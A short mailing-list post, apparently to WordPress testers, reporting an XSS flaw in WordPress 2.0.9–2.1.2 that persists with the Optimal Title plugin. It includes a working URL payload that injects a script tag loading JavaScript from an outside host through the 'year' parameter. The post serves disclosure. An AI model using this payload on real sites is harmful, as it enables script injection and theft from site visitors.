Hi, few days ago someone told me that lot of wordpress blogs are vulnerable aginst xss injections. And he shows me a demo:
<www.your-domain.tld/index.php?year=%22%3E%3C/title%3E%3Cscript%20src=http://h4k.in/j.js%3E%3C/script%3E> this is working in WP 2.0.9 and 2.1.2. I tested ist in few Weblogs. The new Updates in 2.0.10 and 2.1.3 are fixing this BUT not if you are using the Plugin Optimal Title (http://elasticdog.com/2004/09/optimal-title/). The security hole is then still there and in WP 2.0.10 and 2.1.12. I tested it also in few Weblogs. I don't know how serious this problem is because im not a security expert ... and also not a native speaker in english language :-) but this another story. Greetings -- Vladimir Simovic Website: www.vlad-design.de | Weblog: www.perun.net _______________________________________________ wp-testers mailing list [email protected] http://lists.automattic.com/mailman/listinfo/wp-testers
